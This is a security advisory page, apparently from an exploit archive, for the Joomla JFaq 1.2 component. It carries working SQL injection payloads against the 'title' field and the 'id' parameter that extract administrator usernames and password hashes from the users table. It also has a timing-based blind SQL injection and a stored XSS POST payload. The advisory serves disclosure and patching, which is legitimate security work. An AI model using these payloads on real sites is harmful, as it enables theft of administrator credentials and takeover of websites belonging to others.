Joomla Component JFaq 1.2 Multiple Vulnerabilities

2010.07.01
Credit: jdc
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79
CWE-89

# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities # Date: 11 May 2010 # Author: jdc # Version: 1.2 # Tested on: PHP5, MySQL5 "title" input SQL injection --------------------------- title', (select concat(username,char(32),password) from #__users where gid=25 limit 1), 1, 1, 1, 1, 1) -- ' id SQL injection ---------------- requires: magic quotes OFF, Joomla debug mode OFF ?option=com_jfaq &task=detail &id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 from jos_users where gid=25 -- ' id Blind SQL injection ---------------------- requires: magic quotes OFF ?option=com_jfaq &task=categ &id=-1' union select benchmark(1000000,md5(5)) -- ' Persistent XSS -------------- requires: a method to manually POST to form postdata: option=com_jfaq task=add2 visitor_name=foo categ=1 titlu=bar question=<img src="f" onerror="alert(1);//" NOTE: cannot be manually input - editor script strips exploit

References:

http://www.securityfocus.com/bid/41029
http://secunia.com/advisories/40219
http://packetstormsecurity.org/1006-exploits/joomlajfaq-sqlxss.txt
http://osvdb.org/65695


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top